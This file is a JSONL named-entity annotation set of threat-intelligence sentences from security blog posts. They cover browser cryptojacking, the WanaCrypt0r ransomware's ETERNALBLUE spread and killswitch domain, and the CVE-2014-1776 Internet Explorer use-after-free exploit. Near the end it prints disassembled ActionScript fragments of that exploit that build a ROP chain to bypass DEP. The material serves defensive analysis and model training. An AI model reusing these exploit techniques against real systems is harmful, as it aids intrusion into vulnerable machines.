markets.","entities":[{"id":48004,"label":"attack-pattern","start_offset":26,"end_offset":50},{"id":45693,"label":"identity","start_offset":68,"end_offset":75},{"id":45694,"label":"attack-pattern","start_offset":138,"end_offset":160},{"id":45696,"label":"attack-pattern","start_offset":220,"end_offset":236}],"relations":[],"Comments":[]} -{"id":2776,"text":"Before, drive-by attacks focused on abusing a browser’s legitimate download capabilities to download malware onto the victim’s system without their consent or knowledge.","entities":[{"id":48005,"label":"attack-pattern","start_offset":92,"end_offset":108}],"relations":[],"Comments":[]} -{"id":2777,"text":"These new drive-by attacks focus on hijacking the computational resources of the victim’s computer to “mine” cryptocurrency on behalf of the attackers.","entities":[{"id":48006,"label":"attack-pattern","start_offset":36,"end_offset":73}],"relations":[],"Comments":[]} -{"id":2778,"text":" The focus of these attacks is to use the victim’s web browser to access the computational resources of their system.","entities":[],"relations":[],"Comments":[]} -{"id":2779,"text":"The attackers accomplish this through abuse of a legitimate tool by placing it on malicious or compromised websites and running it in the victim’s browser without his or her consent or knowledge when they visit the site.","entities":[],"relations":[],"Comments":[]} -{"id":2780,"text":"The tool is designed to “mine” cryptocurrencies, that is it earns credit in the cryptocurrency in exchange for computing power that is used to power the cryptocurrencies’ digital infrastructure.","entities":[],"relations":[],"Comments":[]} -{"id":2781,"text":"This tool has a legitimate use: sites can and do notify users that they’re using the site visitors’ resources in this way to support the site, typically as a substitute for ads on the site.","entities":[],"relations":[],"Comments":[]} -{"id":2782,"text":"But in this case, the attacker actually gets the credit that the victim’s computational resources earns without the visitors’ consent or knowledge making it a malicious attack.","entities":[],"relations":[],"Comments":[]} -{"id":2783,"text":" Put simply, the net result is that the victim’s computer slows down (sometimes significantly) while on the malicious or compromised website.","entities":[],"relations":[],"Comments":[]} -{"id":2784,"text":"And while the computer is impacted like this, the attacker is earning money.","entities":[],"relations":[],"Comments":[]} -{"id":2785,"text":"The attacker steals the victims computing resources and translates it into a cryptocurrency like Bitcoin.","entities":[{"id":48011,"label":"SOFTWARE","start_offset":97,"end_offset":104}],"relations":[],"Comments":[]} -{"id":2786,"text":" This new kind of attack tells us that at least some cybercriminals are starting to view theft of victim’s computing power to translate into cryptocurrencies as a better business proposition than the traditional practice of loading malware on the victim’s system through drive-by downloads.","entities":[],"relations":[],"Comments":[]} -{"id":2787,"text":" And our research shows that this isn’t an isolated event.","entities":[],"relations":[],"Comments":[]} -{"id":2788,"text":"Our researchers analyzed over 1,000 of sites and what they found was very telling.","entities":[],"relations":[],"Comments":[]} -{"id":2789,"text":" The good news is that these attacks are more like denial of service attacks: they don’t do lasting harm to your system and they end when you leave the site. The bad news is that these are harder to defend against than typical drive-by download attacks.","entities":[],"relations":[],"Comments":[]} -{"id":2790,"text":"Where drive-by download attacks usually exploit unpatched vulnerabilities, the root of these attacks is that they abuse otherwise legitimate functionality: you can’t prevent them by being fully patched.","entities":[],"relations":[],"Comments":[]} -{"id":2791,"text":" Security products that take a comprehensive, layered approach can help prevent these attacks.","entities":[],"relations":[],"Comments":[]} -{"id":2792,"text":"And if you think your system is being affected by one of these attacks, you can, in most cases, end the attack by either leaving the site or closing the browser.","entities":[],"relations":[],"Comments":[]} -{"id":2793,"text":"Most of all, this latest development shows how a changing economic landscape in turn changes the cybercrime landscape.","entities":[],"relations":[],"Comments":[]} -{"id":2794,"text":"Loading malware through drive-by downloads is so 2012: in 2017 it’s about drive-by mining attacks to earn cryptocurrencies.","entities":[{"id":48012,"label":"TIME","start_offset":49,"end_offset":53},{"id":48013,"label":"TIME","start_offset":58,"end_offset":62}],"relations":[],"Comments":[]} -{"id":2795,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2796,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2797,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":2798,"text":"This post is also available in: 日本語 (Japanese) This Unit 42 blog provides an update on the threat situation surrounding the WanaCrypt0r ransomware attacks and how the attack propagates.","entities":[{"id":48014,"label":"identity","start_offset":58,"end_offset":65},{"id":48015,"label":"malware","start_offset":130,"end_offset":141}],"relations":[],"Comments":[]} -{"id":2799,"text":" Initial reports said that the WanaCrypt0r attack began as part of a spam\/phishing campaign.","entities":[{"id":45697,"label":"malware","start_offset":31,"end_offset":42},{"id":45698,"label":"campaign","start_offset":69,"end_offset":91}],"relations":[],"Comments":[]} -{"id":2800,"text":"Unit 42 and other researchers have concluded that these reports are not substantiated.","entities":[{"id":48016,"label":"identity","start_offset":0,"end_offset":7}],"relations":[],"Comments":[]} -{"id":2801,"text":"While the initial attack vector for these attacks is unknown, it is certain that the spread of the ransomware occurs through active exploitation of the ETERNALBLUE vulnerability (CVE-2017-0144) in Microsoft Windows.","entities":[{"id":48017,"label":"vulnerability","start_offset":179,"end_offset":192},{"id":48018,"label":"SOFTWARE","start_offset":197,"end_offset":214},{"id":8563,"label":"vulnerability","start_offset":152,"end_offset":163}],"relations":[{"id":371,"from_id":48018,"to_id":48017,"type":"has"},{"id":373,"from_id":8563,"to_id":48017,"type":"related-to"}],"Comments":[]} -{"id":2802,"text":"Patches for this vulnerability for all supported versions of Windows have been available since March 2017.","entities":[{"id":45699,"label":"TIME","start_offset":95,"end_offset":105},{"id":45700,"label":"SOFTWARE","start_offset":61,"end_offset":68}],"relations":[],"Comments":[]} -{"id":2803,"text":"On Friday May 12, 2017, Microsoft took the extraordinary step of releasing patches for out-of-support versions of Windows to help protect against these attacks.","entities":[{"id":48019,"label":"TIME","start_offset":10,"end_offset":22},{"id":48020,"label":"identity","start_offset":24,"end_offset":33},{"id":48021,"label":"SOFTWARE","start_offset":114,"end_offset":121}],"relations":[],"Comments":[]} -{"id":2804,"text":" As the attack leverages this Microsoft vulnerability, the most appropriate first step to take against the attack is to apply the patches.","entities":[{"id":48022,"label":"identity","start_offset":30,"end_offset":39}],"relations":[],"Comments":[]} -{"id":2805,"text":"Unit 42 researchers have confirmed that the patch is effective against the WanaCrypt0r Ransomware attacks.","entities":[{"id":45701,"label":"identity","start_offset":0,"end_offset":7},{"id":45702,"label":"malware","start_offset":75,"end_offset":86}],"relations":[],"Comments":[]} -{"id":2806,"text":" In addition, Palo Alto Networks, and other vendors, including our fellow members of the Cyber Threat Alliance, have released additional protections that help prevent the spread of the WanaCrypt0r ransomware.","entities":[{"id":48025,"label":"malware","start_offset":185,"end_offset":196},{"id":48023,"label":"identity","start_offset":14,"end_offset":32},{"id":48024,"label":"identity","start_offset":89,"end_offset":110}],"relations":[],"Comments":[]} -{"id":2807,"text":"For information on Palo Alto Networks protections, please see our posting Palo Alto Networks Protections Against WanaCrypt0r Ransomware Attacks.","entities":[{"id":48027,"label":"identity","start_offset":74,"end_offset":92},{"id":48026,"label":"identity","start_offset":19,"end_offset":37},{"id":8580,"label":"malware","start_offset":113,"end_offset":124}],"relations":[],"Comments":[]} -{"id":2808,"text":"As with all ransomware attacks, Palo Alto Networks and Unit 42 recommends that anyone affected NOT pay the ransom.","entities":[{"id":45703,"label":"identity","start_offset":32,"end_offset":50},{"id":45704,"label":"identity","start_offset":55,"end_offset":62}],"relations":[],"Comments":[]} -{"id":2809,"text":"Unit 42 is not aware of any reports where paying the ransom to the WanaCrypt0r attackers has resulted in the recovery of data.","entities":[{"id":48028,"label":"identity","start_offset":0,"end_offset":7},{"id":8587,"label":"malware","start_offset":67,"end_offset":78}],"relations":[],"Comments":[]} -{"id":2810,"text":"In addition, Unit 42 research has shown that very few have attempted to pay the ransom.","entities":[{"id":48029,"label":"identity","start_offset":13,"end_offset":20}],"relations":[],"Comments":[]} -{"id":2811,"text":" Unit 42 is following this situation very closely and will update this blog with any new information as it becomes available.","entities":[{"id":45705,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} -{"id":2812,"text":" WanaCrypt0r is a global ransomware attack that emerged on Friday, May 12, 2017.","entities":[{"id":48030,"label":"malware","start_offset":1,"end_offset":12},{"id":48031,"label":"TIME","start_offset":59,"end_offset":79}],"relations":[],"Comments":[]} -{"id":2813,"text":"It immediately gained broad media attention, due to its destructive nature, how widespread it was, and multiple high profile victims.","entities":[],"relations":[],"Comments":[]} -{"id":2814,"text":"This attack uses the version 2.0 of this ransomware.","entities":[],"relations":[],"Comments":[]} -{"id":2815,"text":"WanaCrypt0r v 1.0 was first reported a few months ago but did not include the worm capability associated with this attack.","entities":[{"id":48032,"label":"malware","start_offset":0,"end_offset":17}],"relations":[],"Comments":[]} -{"id":2816,"text":" Reports quickly emerged that this attack was effective due to the presence of code exploiting a vulnerability (CVE-2017-0144) in Microsoft Windows (code named: ETERNALBLUE) that was released as part of the Equation Group dump by the Shadow Brokers in their fifth leak on April 14, 2017.","entities":[{"id":48034,"label":"SOFTWARE","start_offset":130,"end_offset":147},{"id":48035,"label":"TIME","start_offset":272,"end_offset":286},{"id":48033,"label":"vulnerability","start_offset":112,"end_offset":125},{"id":8600,"label":"vulnerability","start_offset":161,"end_offset":172},{"id":8601,"label":"threat-actor","start_offset":207,"end_offset":221},{"id":8602,"label":"threat-actor","start_offset":230,"end_offset":248}],"relations":[{"id":377,"from_id":48034,"to_id":48033,"type":"has"},{"id":378,"from_id":8600,"to_id":48033,"type":"related-to"},{"id":379,"from_id":8600,"to_id":8601,"type":"related-to"}],"Comments":[]} -{"id":2817,"text":"Microsoft patched this vulnerability as part of the March 2017 Monthly Security Update Release by Microsoft Security Bulletin MS17-010.","entities":[{"id":45706,"label":"identity","start_offset":0,"end_offset":9},{"id":45708,"label":"identity","start_offset":98,"end_offset":107},{"id":45707,"label":"TIME","start_offset":52,"end_offset":62}],"relations":[],"Comments":[]} -{"id":2818,"text":"This is a SYSTEM-level remote code execution (RCE) in the handling of the Server Message Block (SMB) protocol in Microsoft Windows.","entities":[{"id":48036,"label":"attack-pattern","start_offset":23,"end_offset":50},{"id":48037,"label":"SOFTWARE","start_offset":74,"end_offset":100},{"id":48038,"label":"SOFTWARE","start_offset":113,"end_offset":130}],"relations":[],"Comments":[]} -{"id":2819,"text":" The attack uses this vulnerability to spread the WanaCrypt0r ransomware on the network.","entities":[{"id":8612,"label":"malware","start_offset":50,"end_offset":61}],"relations":[],"Comments":[]} -{"id":2820,"text":"This is a classic network worm-class vulnerability like MS-Blaster and Conficker.","entities":[{"id":45709,"label":"vulnerability","start_offset":56,"end_offset":66},{"id":45710,"label":"vulnerability","start_offset":71,"end_offset":80}],"relations":[],"Comments":[]} -{"id":2821,"text":" Early reports indicated that the initial attack vector was via spam and\/or phishing email.","entities":[{"id":48039,"label":"attack-pattern","start_offset":64,"end_offset":90}],"relations":[],"Comments":[]} -{"id":2822,"text":"However, this has not been confirmed and is unlikely to account for the global spread of the malware.","entities":[],"relations":[],"Comments":[]} -{"id":2823,"text":" When the WanaCrypt0r ransomware executes successfully, it will encrypt key files on the system and display a ransom note as shown below (SOURCE: Microsoft).","entities":[{"id":45712,"label":"identity","start_offset":146,"end_offset":155},{"id":45711,"label":"malware","start_offset":10,"end_offset":21}],"relations":[],"Comments":[]} -{"id":2824,"text":"Figure 1 Ransom note for WanaCrypt0r ","entities":[{"id":8627,"label":"tools","start_offset":25,"end_offset":36}],"relations":[],"Comments":[]} -{"id":2825,"text":"One thing reports have indicated that make this attack unique is a “killswitch” capability built into the malware.","entities":[],"relations":[],"Comments":[]} -{"id":2826,"text":"This “killswitch” will prevent the WanaCrypt0r ransomware from executing.","entities":[{"id":45713,"label":"malware","start_offset":35,"end_offset":46}],"relations":[],"Comments":[]} -{"id":2827,"text":"The “killswitch” is code which will attempt to connect to an extremely long domain that should not resolve.","entities":[],"relations":[],"Comments":[]} -{"id":2828,"text":"The initial variant of WanaCrypt0r uses hxxp:\/\/iuqerfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com, however, there are reports of newer variants using different domains.","entities":[{"id":48040,"label":"URL","start_offset":40,"end_offset":94},{"id":8633,"label":"malware","start_offset":23,"end_offset":34}],"relations":[],"Comments":[]} -{"id":2829,"text":"If it was successful in connecting to the domain, the ransomware would not execute.","entities":[],"relations":[],"Comments":[]} -{"id":2830,"text":"However, it was easily subverted to work against the malware.","entities":[],"relations":[],"Comments":[]} -{"id":2831,"text":"A security researcher in the United Kingdom initially registered this domain in order to track this threat, and soon discovered that in doing so, he had enabled this “killswitch”, causing a number of instances of WanaCrypt0r to not execute for a large number of infected systems.","entities":[{"id":48041,"label":"location","start_offset":29,"end_offset":43},{"id":48042,"label":"malware","start_offset":213,"end_offset":224}],"relations":[],"Comments":[]} -{"id":2832,"text":" On Friday, May 12, 2017, Microsoft announced that they were making an emergency patch available for out-of-support versions of Windows (Windows XP, Windows 8 and Windows Server 2003). ","entities":[{"id":45717,"label":"SOFTWARE","start_offset":128,"end_offset":135},{"id":45714,"label":"TIME","start_offset":4,"end_offset":24},{"id":45716,"label":"identity","start_offset":26,"end_offset":35},{"id":45718,"label":"SOFTWARE","start_offset":137,"end_offset":147},{"id":45719,"label":"SOFTWARE","start_offset":149,"end_offset":158},{"id":45720,"label":"SOFTWARE","start_offset":163,"end_offset":182}],"relations":[],"Comments":[]} -{"id":2833,"text":"As of this writing attacks appear to have subsided.","entities":[],"relations":[],"Comments":[]} -{"id":2834,"text":"This is likely due to increased uptake of the patch MS17-010 in light of the WanaCrypt0r attacks, as well as efforts made within the security community.","entities":[{"id":48043,"label":"malware","start_offset":77,"end_offset":88}],"relations":[],"Comments":[]} -{"id":2835,"text":" Unit 42 research shows there is likely very little actual payment of ransom.","entities":[{"id":48044,"label":"identity","start_offset":1,"end_offset":8}],"relations":[],"Comments":[]} -{"id":2836,"text":"We analyzed our known WanaCrypt0r samples and extract the following Bitcoin (BTC) addresses likely associated with the attackers and associated totals: This results in a total of 36 BTC, or roughly $63k based on the current price of BTC.","entities":[{"id":48045,"label":"identity","start_offset":22,"end_offset":33},{"id":48046,"label":"SOFTWARE","start_offset":68,"end_offset":81}],"relations":[],"Comments":[]} -{"id":2837,"text":"Given that WanaCrypt0r requests $300 per infected machine, we can infer that approximately 210 victims have made payments to the attackers.","entities":[{"id":48047,"label":"malware","start_offset":11,"end_offset":22}],"relations":[],"Comments":[]} -{"id":2838,"text":" Reconnaissance This attack does not appear to be targeted.","entities":[],"relations":[],"Comments":[]} -{"id":2839,"text":"Therefore, there appears to be little recon as part of this attack.","entities":[],"relations":[],"Comments":[]} -{"id":2840,"text":"There are some reports that there may be scanning of TCP port 445, which is one of the ports associated with SMB.","entities":[],"relations":[],"Comments":[]} -{"id":2841,"text":"But these reports haven’t been conclusively verified.","entities":[],"relations":[],"Comments":[]} -{"id":2842,"text":" There is no consensus in the industry on what the delivery method\/initial infection vector is.","entities":[],"relations":[],"Comments":[]} -{"id":2843,"text":"There have been several theories: Unit 42 believes the most likely delivery method is method #2.","entities":[{"id":48048,"label":"identity","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} -{"id":2844,"text":"However, this is not conclusively provenLateral Movement","entities":[{"id":45722,"label":"attack-pattern","start_offset":40,"end_offset":56}],"relations":[],"Comments":[]} -{"id":2845,"text":" The WanaCrypt0r ransomware spreads itself by heavily scanning over TCP port 445 (associated with SMB) and attempting to exploit the ETERNALBLUE vulnerability on systems.","entities":[{"id":48049,"label":"malware","start_offset":5,"end_offset":16},{"id":8683,"label":"vulnerability","start_offset":133,"end_offset":144}],"relations":[{"id":381,"from_id":48049,"to_id":8683,"type":"exploits"}],"Comments":[]} -{"id":2846,"text":"A successful attack against this vulnerability will infect the target system with the WanaCrypt0r ransomware, which will encrypt data on the target system and attempt to spread itself once again.","entities":[{"id":48050,"label":"malware","start_offset":86,"end_offset":97}],"relations":[],"Comments":[]} -{"id":2847,"text":"Multiple vendors report that the malware includes the ability to spread via port 445 scans and attacks against the ETERNALBLUE vulnerability not only on internal networks but also across the Internet.","entities":[{"id":45723,"label":"vulnerability","start_offset":115,"end_offset":126}],"relations":[],"Comments":[]} -{"id":2848,"text":"These reports indicate that in addition to the internal lateral movement already outlined, the WanaCrypt0r ransomware will scan for port 445 on random external IP addresses and if it finds an IP address with an open port 445, it will then scan all devices on the same \/24 IP range (i.e. that share the first three octets as that IP address with the open port 445). In general, WanaCrypt0r does not have C2 capabilities but it does utilize the TOR network to communicate encryption keys for decryption upon payment of ransom.","entities":[{"id":48051,"label":"malware","start_offset":95,"end_offset":106},{"id":48053,"label":"tools","start_offset":444,"end_offset":447},{"id":48052,"label":"malware","start_offset":378,"end_offset":389}],"relations":[],"Comments":[]} -{"id":2849,"text":"It has been reported that the DOUBLEPULSAR backdoor (also from the Equation Group leak by Shadow Brokers) is installed and used to execute the malware after successful exploitation of a host via ETERNALBLUE, but this warrants further analysis.","entities":[{"id":48054,"label":"threat-actor","start_offset":67,"end_offset":81},{"id":8706,"label":"threat-actor","start_offset":90,"end_offset":104},{"id":8709,"label":"vulnerability","start_offset":195,"end_offset":206},{"id":8704,"label":"vulnerability","start_offset":30,"end_offset":42}],"relations":[{"id":383,"from_id":48054,"to_id":8709,"type":"exploits"},{"id":382,"from_id":48054,"to_id":8704,"type":"exploits"}],"Comments":[]} -{"id":2850,"text":" Overall, WanaCrypt0r has been a notable incident within the security community, as the threat couples a wormable vulnerability\/exploit with a ransomware family.","entities":[{"id":45724,"label":"malware","start_offset":10,"end_offset":21}],"relations":[],"Comments":[]} -{"id":2851,"text":"Users are urged to apply the necessary Microsoft patch to protect themselves against this threat.","entities":[{"id":48055,"label":"identity","start_offset":39,"end_offset":48}],"relations":[],"Comments":[]} -{"id":2852,"text":" For protections, customers are advised to view this blog post that outlines the various ways the Palo Alto Networks platform prevents this threat. Cyber Threat Alliance member ElevenPaths has developed a tool which can be used to attempt to recover some files deleted by WanaCrypt0r.","entities":[{"id":48059,"label":"identity","start_offset":178,"end_offset":189},{"id":48058,"label":"identity","start_offset":149,"end_offset":170},{"id":48057,"label":"identity","start_offset":98,"end_offset":116},{"id":48056,"label":"malware","start_offset":273,"end_offset":284}],"relations":[],"Comments":[]} -{"id":2853,"text":"You can find more information on this tool here.","entities":[],"relations":[],"Comments":[]} -{"id":2854,"text":"Register for Ignite ’17 Security Conference Vancouver, BC June 12–15, 2017 ","entities":[{"id":48060,"label":"location","start_offset":45,"end_offset":58},{"id":48061,"label":"TIME","start_offset":59,"end_offset":75}],"relations":[],"Comments":[]} -{"id":2855,"text":"Ignite ’17 Security Conference is a live, four-day conference designed for today’s security professionals.","entities":[],"relations":[],"Comments":[]} -{"id":2856,"text":"Hear from innovators and experts, gain real-world skills through hands-on sessions and interactive workshops, and find out how breach prevention is changing the security industry.","entities":[],"relations":[],"Comments":[]} -{"id":2857,"text":"Visit the Ignite website for more information on tracks, workshops and marquee sessions.","entities":[],"relations":[],"Comments":[]} -{"id":2858,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2859,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":2860,"text":"The latest episode of the Don’t Panic cybersecurity podcast is now live.","entities":[],"relations":[],"Comments":[]} -{"id":2861,"text":" In this latest episode, Ryan goes back to the topic he talked about in his 2018 predictions piece “The Era of Software Supply-Chain Attacks Has Begun”: Software Supply Chain attacks. ","entities":[{"id":48062,"label":"identity","start_offset":25,"end_offset":29},{"id":48063,"label":"TIME","start_offset":76,"end_offset":80}],"relations":[],"Comments":[]} -{"id":2862,"text":"As a reminder, “Don’t Panic,” is the official podcast of Unit 42, the Palo Alto Network threat intelligence team and features Palo Alto Networks CSO Rick Howard and Palo Alto Networks Senior Vice President, Threat Intelligence Ryan Olson. You can find this episode and other Palo Alto Networks podcasts on iTunes, Google Play, or integrate the RSS feed into your favorite service.","entities":[{"id":45725,"label":"identity","start_offset":57,"end_offset":64},{"id":45729,"label":"identity","start_offset":165,"end_offset":183},{"id":45726,"label":"identity","start_offset":70,"end_offset":112},{"id":45727,"label":"identity","start_offset":126,"end_offset":148},{"id":45728,"label":"identity","start_offset":149,"end_offset":160},{"id":45731,"label":"identity","start_offset":227,"end_offset":237},{"id":45732,"label":"identity","start_offset":275,"end_offset":294},{"id":45733,"label":"SOFTWARE","start_offset":307,"end_offset":313},{"id":45734,"label":"SOFTWARE","start_offset":315,"end_offset":326},{"id":45735,"label":"SOFTWARE","start_offset":345,"end_offset":348}],"relations":[],"Comments":[]} -{"id":2863,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":2864,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} -{"id":2865,"text":"By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement. ","entities":[],"relations":[],"Comments":[]} -{"id":2866,"text":"Late last month reports surfaced that a new Internet Explorer vulnerability (CVE-2014-1776) was being exploited in targeted attacks.","entities":[{"id":48064,"label":"SOFTWARE","start_offset":44,"end_offset":62},{"id":48065,"label":"vulnerability","start_offset":77,"end_offset":90}],"relations":[{"id":384,"from_id":48064,"to_id":48065,"type":"has"}],"Comments":[]} -{"id":2867,"text":"The vulnerability allows an attacker to take full control over the system after a user views a web page in their browser.","entities":[],"relations":[],"Comments":[]} -{"id":2868,"text":"According to Microsoft, it affects versions of Internet Explorer from version 6 to 11, meaning that almost all IE users are vulnerable to this bug.","entities":[{"id":48066,"label":"SOFTWARE","start_offset":47,"end_offset":64},{"id":45736,"label":"identity","start_offset":13,"end_offset":22},{"id":45738,"label":"SOFTWARE","start_offset":111,"end_offset":113}],"relations":[],"Comments":[]} -{"id":2869,"text":"This vulnerability is so widespread that Microsoft has released patches to protect Windows XP, for which Microsoft has ended support since April 8, 2014.","entities":[{"id":48068,"label":"SOFTWARE","start_offset":83,"end_offset":93},{"id":48070,"label":"TIME","start_offset":139,"end_offset":152},{"id":48067,"label":"identity","start_offset":41,"end_offset":50},{"id":48069,"label":"identity","start_offset":105,"end_offset":114}],"relations":[],"Comments":[]} -{"id":2870,"text":" Researchers from Palo Alto Networks have investigated this exploit in depth and concluded that this is a Use-After-Free vulnerability that occurs when Internet Explorer tries to reuse a freed CMarkup object.","entities":[{"id":48072,"label":"SOFTWARE","start_offset":152,"end_offset":169},{"id":48071,"label":"identity","start_offset":18,"end_offset":36}],"relations":[],"Comments":[]} -{"id":2871,"text":"Attackers can manipulate memory allocations by using JavaScript to allocate an object that is freed before all references to that object are removed.","entities":[],"relations":[],"Comments":[]} -{"id":2872,"text":"Once the object is free the Flash file will overwrite a length field in the vector object and allow arbitrary memory access.","entities":[{"id":48073,"label":"SOFTWARE","start_offset":28,"end_offset":33}],"relations":[],"Comments":[]} -{"id":2873,"text":"After that the exploit uses a ROP chain to overwrite the virtual function table of a sound object to gain full control.","entities":[],"relations":[],"Comments":[]} -{"id":2874,"text":"The exploit utilized several advanced exploit techniques to make it almost 100% reliable.","entities":[],"relations":[],"Comments":[]} -{"id":2875,"text":"The exploit used in the wild contains two major parts, one is HTML which sets up the page to exploit, and the other is a Flash file which builds the memory layout in IE process and triggers the bug.","entities":[{"id":48074,"label":"SOFTWARE","start_offset":166,"end_offset":168},{"id":48075,"label":"SOFTWARE","start_offset":121,"end_offset":126}],"relations":[],"Comments":[]} -{"id":2876,"text":"Two parts must be combined to ensure a successful attack.","entities":[],"relations":[],"Comments":[]} -{"id":2877,"text":"The attack separated critical code into different pieces so that researchers could not reproduce the original exploit until they have both files.","entities":[],"relations":[],"Comments":[]} -{"id":2878,"text":" The techniques used in this exploit are similar to those used in other recent attacks.","entities":[],"relations":[],"Comments":[]} -{"id":2879,"text":"Last year, exploitation of CVE-2013-3163 targeted Internet Explorer 8 and earlier this year, we found exploitation of CVE-2014-0322 in Internet Explorer 10.","entities":[{"id":48076,"label":"vulnerability","start_offset":27,"end_offset":40},{"id":48077,"label":"SOFTWARE","start_offset":50,"end_offset":69},{"id":48079,"label":"SOFTWARE","start_offset":135,"end_offset":155},{"id":48078,"label":"vulnerability","start_offset":118,"end_offset":131}],"relations":[{"id":385,"from_id":48077,"to_id":48076,"type":"has"},{"id":386,"from_id":48079,"to_id":48078,"type":"has"}],"Comments":[]} -{"id":2880,"text":"Similarities in each of these exploits indicate that they may have been created by the same author.","entities":[],"relations":[],"Comments":[]} -{"id":2881,"text":"All three exploits share the same exploit techniques: All the Flash files used across the exploits have similar structures and even the same variable names.","entities":[{"id":48080,"label":"SOFTWARE","start_offset":63,"end_offset":68}],"relations":[],"Comments":[]} -{"id":2882,"text":"For example, they all use the Timer object to check if a Vector object is modified.","entities":[],"relations":[],"Comments":[]} -{"id":2883,"text":"The Timers are all set to repeat every one second for 4,096 seconds.","entities":[{"id":8814,"label":"TIME","start_offset":33,"end_offset":49},{"id":8815,"label":"TIME","start_offset":54,"end_offset":67}],"relations":[],"Comments":[]} -{"id":2884,"text":"The Vector object is named ‘s’ and the Sound object is named “ss” in the Flash files used in all three exploits.","entities":[{"id":48081,"label":"SOFTWARE","start_offset":73,"end_offset":78}],"relations":[],"Comments":[]} -{"id":2885,"text":"The following code is snippet from the disassembled ActionScript code of CVE-2014-1776.","entities":[{"id":48082,"label":"vulnerability","start_offset":73,"end_offset":86}],"relations":[],"Comments":[]} -{"id":2886,"text":" Neither of these variables is actually used in this exploit.","entities":[],"relations":[],"Comments":[]} -{"id":2887,"text":"If we go back and examine the exploit code for CVE-2013-3163, we see that the string ‘org’ was originally used as the trigger, and the variable ‘found’ was originally used as a flag indicating if the Vector object was modified.","entities":[{"id":48083,"label":"vulnerability","start_offset":47,"end_offset":60}],"relations":[],"Comments":[]} -{"id":2888,"text":"It appears that the attacker reused the code from the earlier exploit and forgot to remove the unnecessary variables.","entities":[],"relations":[],"Comments":[]} -{"id":2889,"text":"s[_local28][(((_local41 - _local12) \/ 4) + 9)] = _local9; s[_local28][(((_local41 - _local12) \/ 4) + 10)]","entities":[],"relations":[],"Comments":[]} -{"id":2890,"text":"= 13078672;","entities":[],"relations":[],"Comments":[]} -{"id":2891,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 11)]","entities":[],"relations":[],"Comments":[]} -{"id":2892,"text":"= _","entities":[],"relations":[],"Comments":[]} -{"id":2893,"text":"local7","entities":[],"relations":[],"Comments":[]} -{"id":2894,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 12)]","entities":[],"relations":[],"Comments":[]} -{"id":2895,"text":"= 3096481936;","entities":[],"relations":[],"Comments":[]} -{"id":2896,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 13)]","entities":[],"relations":[],"Comments":[]} -{"id":2897,"text":"= (this.m_longArrBase - 8);","entities":[],"relations":[],"Comments":[]} -{"id":2898,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 14)]","entities":[],"relations":[],"Comments":[]} -{"id":2899,"text":"= 13078672;","entities":[],"relations":[],"Comments":[]} -{"id":2900,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 15)]","entities":[],"relations":[],"Comments":[]} -{"id":2901,"text":"= this.m_rawLen;","entities":[],"relations":[],"Comments":[]} -{"id":2902,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 16)]","entities":[],"relations":[],"Comments":[]} -{"id":2903,"text":"= 3968066955;","entities":[],"relations":[],"Comments":[]} -{"id":2904,"text":" s[_local28][(((_local41 - _local12) \/ 4) + 17)]","entities":[],"relations":[],"Comments":[]} -{"id":2905,"text":"= 753635372;","entities":[],"relations":[],"Comments":[]} -{"id":2906,"text":" The exploit uses the code above to restore the corrupted object and save the stack frame on the heap so that the process would not crash after the exploit is successful.","entities":[],"relations":[],"Comments":[]} -{"id":2907,"text":"All three exploits use the same method and similar addresses to achieve that goal, even including the same hard coded assembly and registers.","entities":[],"relations":[],"Comments":[]} -{"id":2908,"text":"_local10 = this.m_ZwProtectAddr; _local41 = _local6; s[_local28][((((_local6 - _local12) \/ 4) - 2) - 4)] = (_local41 & 0xFFFFF000); s[_local28][((((_local6 - _local12) \/ 4) - 1) - 4)] = 0x3000; s[_local28][((_local6 - _local12) \/ 4)] = _local10; s[_local28][(((_local6 - _local12) \/ 4) + 1)] = (_local41 + 28); The code above shows the Flash code setting up the ROP chain to bypass DEP and includes another interesting marker.","entities":[{"id":48084,"label":"SOFTWARE","start_offset":342,"end_offset":347}],"relations":[],"Comments":[]} -{"id":2909,"text":"Normally programmers begin counting at 0 when referencing arrays, but in all three exploits they began at -2, which is quite unusual.","entities":[],"relations":[],"Comments":[]} -{"id":2910,"text":"Additionally, each sample uses a Sound object named ‘snd’ to gain control, and they all invoke the function toString(). ","entities":[],"relations":[],"Comments":[]} -{"id":2911,"text":"The many similarities between these exploits lead us to believe they were written by the same actor or group.","entities":[],"relations":[],"Comments":[]} -{"id":2912,"text":"Or at the very least, a common template has been used to craft exploits for the three Internet Explorer vulnerabilities we analyzed.","entities":[{"id":48085,"label":"SOFTWARE","start_offset":86,"end_offset":103}],"relations":[],"Comments":[]} -{"id":2913,"text":"This re-use of techniques is common among exploits, even if they were not developed by the same group, and Palo Alto Networks employs a unique payload-based signature detection methodology, which is able to look at the behaviors of an exploit to prevent similar attacks in the future.","entities":[{"id":45740,"label":"identity","start_offset":107,"end_offset":125}],"relations":[],"Comments":[]} -{"id":2914,"text":" Palo Alto Networks customers with a Threat Prevention subscription were automatically protected from exploitation of these vulnerabilities: We suggest customers ensure they are running the latest content version on their devices and apply the patches Microsoft released on May 1, 2014. Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email 